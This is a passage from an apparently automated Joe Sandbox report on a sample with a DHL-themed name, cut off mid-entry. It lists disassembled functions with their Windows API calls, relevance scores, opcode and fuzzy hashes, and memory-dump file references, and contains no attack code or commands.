                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                      • String ID:
                                                                                      • API String ID: 3160817290-0
                                                                                      • Opcode ID: dabe36bb641a8daab7fb1edea3764177573c8ef941e688e46bc8625d1d72cedd
                                                                                      • Instruction ID: d2e89997e129d24fcf63bf3b3af217df9c8b94417d26b27c0d4dbfc57664b319
                                                                                      • Opcode Fuzzy Hash: dabe36bb641a8daab7fb1edea3764177573c8ef941e688e46bc8625d1d72cedd
                                                                                      • Instruction Fuzzy Hash: D9F0C831A05E0127E2622734BC16EAE259BAFC27A1F260418F928961D3EF2889015270
                                                                                      Function 000C8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00049639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00049693
                                                                                        • Part of subcall function 00049639: SelectObject.GDI32(?,00000000), ref: 000496A2
                                                                                        • Part of subcall function 00049639: BeginPath.GDI32(?), ref: 000496B9
                                                                                        • Part of subcall function 00049639: SelectObject.GDI32(?,00000000), ref: 000496E2
                                                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 000C8A4E
                                                                                      • LineTo.GDI32(?,00000003,00000000), ref: 000C8A62
                                                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 000C8A70
                                                                                      • LineTo.GDI32(?,00000000,00000003), ref: 000C8A80
                                                                                      • EndPath.GDI32(?), ref: 000C8A90
                                                                                      • StrokePath.GDI32(?), ref: 000C8AA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                      • String ID:
                                                                                      • API String ID: 43455801-0
                                                                                      • Opcode ID: 6c45bd2f41d66901de25dfc1eede3655f0d6fd0f654db478d29bc16650242590
                                                                                      • Instruction ID: 37bc52b5127a5d8e3340a82d4ea5b1a9e91207618819996dcb33d18f6d579dd7
                                                                                      • Opcode Fuzzy Hash: 6c45bd2f41d66901de25dfc1eede3655f0d6fd0f654db478d29bc16650242590
                                                                                      • Instruction Fuzzy Hash: 38110576400108FFEB129F90DC88EAA7FACEB08354F048426FA599A1A1C7759D95DFA0
                                                                                      Function 000951FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDC.USER32(00000000), ref: 00095218
                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00095229
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00095230
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00095238
                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0009524F
                                                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00095261
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsDevice$Release
                                                                                      • String ID:
                                                                                      • API String ID: 1035833867-0
                                                                                      • Opcode ID: 58386c49cd1928ab9c6fe79766913985956c79141d07f3ab96a990cef36f62f0
                                                                                      • Instruction ID: edf96cbd0c39c1b155ecddcd1aa4c1bfda6ab6dc44ba9fe89e4bc84296aea43d
                                                                                      • Opcode Fuzzy Hash: 58386c49cd1928ab9c6fe79766913985956c79141d07f3ab96a990cef36f62f0
                                                                                      • Instruction Fuzzy Hash: BE018475A01704BBFF105BA6DC49E5EBFB8FF44351F044065FA08A7291D6709800CB60
                                                                                      Function 00031BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00031BF4
                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00031BFC
                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00031C07
                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00031C12
                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00031C1A
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00031C22
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual
                                                                                      • String ID:
                                                                                      • API String ID: 4278518827-0
                                                                                      • Opcode ID: a9f242545921ae80d2b34ba0c21787a4405b1a36686a66d0a18deddde3371c08
                                                                                      • Instruction ID: c994b5c1d497d3badb4c738d8099a54303410683415b32105acff3db0e0d8823
                                                                                      • Opcode Fuzzy Hash: a9f242545921ae80d2b34ba0c21787a4405b1a36686a66d0a18deddde3371c08
                                                                                      • Instruction Fuzzy Hash: 5A0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BE15C4BA42C7F5A864CBE5
                                                                                      Function 0009EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0009EB30
                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0009EB46
                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0009EB55
                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0009EB64
                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0009EB6E
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0009EB75
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                      • String ID:
                                                                                      • API String ID: 839392675-0
                                                                                      • Opcode ID: 62333c02c6702ca1f5b4d46bd6110d6e573db820fbb1e590ad075e1d1413b195
                                                                                      • Instruction ID: 71825f32cf350f8b7d3d547511659a5db09fbaa9b29554a8494b1c13ba8944ae
                                                                                      • Opcode Fuzzy Hash: 62333c02c6702ca1f5b4d46bd6110d6e573db820fbb1e590ad075e1d1413b195
                                                                                      • Instruction Fuzzy Hash: 7EF01772640158BBF7215B62DD0EEAB3A7CEBCAB15F000158FA05D109197A85A0186B5
                                                                                      Function 00087439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetClientRect.USER32(?), ref: 00087452
                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00087469
                                                                                      • GetWindowDC.USER32(?), ref: 00087475
                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00087484
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00087496
                                                                                      • GetSysColor.USER32(00000005), ref: 000874B0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                      • String ID:
                                                                                      • API String ID: 272304278-0
                                                                                      • Opcode ID: 7d608743df47ba7620da86117da3cdd53f12d0eea6d2686c326672f6d2d8b28e
                                                                                      • Instruction ID: 6f45634a6fb610d7caa3f9d0d4593984f6dc47b25b5cf0a9e167fa47ee43c963
                                                                                      • Opcode Fuzzy Hash: 7d608743df47ba7620da86117da3cdd53f12d0eea6d2686c326672f6d2d8b28e
                                                                                      • Instruction Fuzzy Hash: FA018B31400615EFFB50AFA4DC08FAE7BB5FB04321F240064F959A20A1CB355E82AB10
                                                                                      Function 00091874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0009187F
                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 0009188B
                                                                                      • CloseHandle.KERNEL32(?), ref: 00091894
                                                                                      • CloseHandle.KERNEL32(?), ref: 0009189C
                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 000918A5
                                                                                      • HeapFree.KERNEL32(00000000), ref: 000918AC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                      • String ID:
                                                                                      • API String ID: 146765662-0
                                                                                      • Opcode ID: facb89ec12ab216342231937769491057db082d3d679a02333b643408e72092b
                                                                                      • Instruction ID: f036e55c47305fb57bc45ca9b0e81be0344b669963981dadb8502f2afb96e6b0
                                                                                      • Opcode Fuzzy Hash: facb89ec12ab216342231937769491057db082d3d679a02333b643408e72092b
                                                                                      • Instruction Fuzzy Hash: 9BE01A36404501BFFB015FA2ED0CD0ABF39FF4AB22B108220F62981470CB369420DF50
                                                                                      Function 0009C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00037620: _wcslen.LIBCMT ref: 00037625
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0009C6EE
                                                                                      • _wcslen.LIBCMT ref: 0009C735
                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0009C79C
                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0009C7CA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                                                      • String ID: 0
                                                                                      • API String ID: 1227352736-4108050209
                                                                                      • Opcode ID: 35edcb0eaa63da9f7ec33e8ed33f237ad7bb603e068410564c5e01abf8398e00
                                                                                      • Instruction ID: f4bc7ad02b7b4d24b936be140614355d17619289acdbf9383f24fae1fecd539e
                                                                                      • Opcode Fuzzy Hash: 35edcb0eaa63da9f7ec33e8ed33f237ad7bb603e068410564c5e01abf8398e00
                                                                                      • Instruction Fuzzy Hash: 66510371A083019BEB509F68C885FABB7E8AF49314F04092DF995D31E1DB74D904EB52
                                                                                      Function 000BAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 000BAEA3
                                                                                        • Part of subcall function 00037620: _wcslen.LIBCMT ref: 00037625
                                                                                      • GetProcessId.KERNEL32(00000000), ref: 000BAF38
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000BAF67
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                      • String ID: <$@
                                                                                      • API String ID: 146682121-1426351568
                                                                                      • Opcode ID: ef565f73cba3961d996f66fd7252b4e5785149e3b3289cea9bd01b949822b319
                                                                                      • Instruction ID: 5c34fd495a52dcafe86060aeff5ac585d7d4828d51d0938e65d4d78c4b78a461
                                                                                      • Opcode Fuzzy Hash: ef565f73cba3961d996f66fd7252b4e5785149e3b3289cea9bd01b949822b319
                                                                                      • Instruction Fuzzy Hash: 46715571A00619DFCB15DF94C484ADEBBF4BF09314F0484A9E85AAB3A2CB74ED45CB91
                                                                                      Function 000C6278 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowRect.USER32(00EFE340,?), ref: 000C62E2
                                                                                      • ScreenToClient.USER32(?,?), ref: 000C6315
                                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 000C6382
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                      • String ID: p]
                                                                                      • API String ID: 3880355969-1923361398
                                                                                      • Opcode ID: 889c98171c8136d8c5efb7380aad6016e9270beb11f815b6181843ad178da9a8
                                                                                      • Instruction ID: ab0ce2fea6f6f1fddf5e3ef4e073f18c9d6a11bc13c14e60efa816a012c119b5
                                                                                      • Opcode Fuzzy Hash: 889c98171c8136d8c5efb7380aad6016e9270beb11f815b6181843ad178da9a8
                                                                                      • Instruction Fuzzy Hash: 4C514A70A00649AFDB20DF68D980EAE7BF5EB45360F10826DF8559B2A1D731AE81CB50
                                                                                      Function 0009719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00097206
                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0009723C
                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0009724D
                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000972CF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                      • String ID: DllGetClassObject
                                                                                      • API String ID: 753597075-1075368562
                                                                                      • Opcode ID: c0a172c70f9b0e3d89e55171a2dcd6a761f0f9debb0d81bf49c8d9ea44842ef0
                                                                                      • Instruction ID: 2c87bd64bb4d5f2af65b8c79ea4e0f53eb747df96d5298733aa2de7012e7e6bd
                                                                                      • Opcode Fuzzy Hash: c0a172c70f9b0e3d89e55171a2dcd6a761f0f9debb0d81bf49c8d9ea44842ef0
                                                                                      • Instruction Fuzzy Hash: 7141AF72624204EFDF25CF54C884A9A7BA9EF45710F2480ADFD099F24AD7B1DD40EBA0
                                                                                      Function 000C52C1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 104windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 000C5352
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000C5375
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 000C5382
                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 000C53A8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                                                      • String ID: p]
                                                                                      • API String ID: 3340791633-1923361398
                                                                                      • Opcode ID: eb063d5704efe806c980da6b655c440f4e12b193fdc8fd0d479d3d0183af9edd
                                                                                      • Instruction ID: 6b086df7715d862ea9fae2cce252366979d28267ed05fe02aaafc807145ae4e0
                                                                                      • Opcode Fuzzy Hash: eb063d5704efe806c980da6b655c440f4e12b193fdc8fd0d479d3d0183af9edd
                                                                                      • Instruction Fuzzy Hash: 7031B238B55A88AFEB709B14CC05FEC77A5AB04392F58410AFA51961E2C7B4BBC09B41
                                                                                      Function 000C7674 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ClientToScreen.USER32(?,?), ref: 000C769A
                                                                                      • GetWindowRect.USER32(?,?), ref: 000C7710
                                                                                      • PtInRect.USER32(?,?,000C8B89), ref: 000C7720
                                                                                      • MessageBeep.USER32(00000000), ref: 000C778C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                      • String ID: p]
                                                                                      • API String ID: 1352109105-1923361398
                                                                                      • Opcode ID: 14af9ab6cd3e6dcc0161762e49419115f5c5b76f942ace82172e09d0f6da11aa
                                                                                      • Instruction ID: eaa1fb6d56119dc77ba2f80312ce49cfc3893fc71c19094aabfbcb89a3fef6fb
                                                                                      • Opcode Fuzzy Hash: 14af9ab6cd3e6dcc0161762e49419115f5c5b76f942ace82172e09d0f6da11aa
                                                                                      • Instruction Fuzzy Hash: 9A419C34609218AFDB51CF68C898FAD77F4BB48304F1882ACE4589B2A1C374A981CF90
                                                                                      Function 00091DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                        • Part of subcall function 00093CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00093CCA
                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00091E66
                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00091E79
                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00091EA9
                                                                                        • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$_wcslen$ClassName
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 2081771294-1403004172
                                                                                      • Opcode ID: ee48548177b7113b5a9b9fc0ecbb5adc9c36e22797a5e36eb8b3dd99cb971aea
                                                                                      • Instruction ID: b164fc52dac731567b5ef6f2d2418a1d727c9de61bb0c2ebbd8a79d356930e7c
                                                                                      • Opcode Fuzzy Hash: ee48548177b7113b5a9b9fc0ecbb5adc9c36e22797a5e36eb8b3dd99cb971aea
                                                                                      • Instruction Fuzzy Hash: 56212475A00109BFEF15ABA4DC4ACFFB7BCDF46350F104129F925A71E2DB784909AA20
                                                                                      Function 000C4653 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 87windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 000C4705
                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 000C4713
                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 000C471A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$DestroyWindow
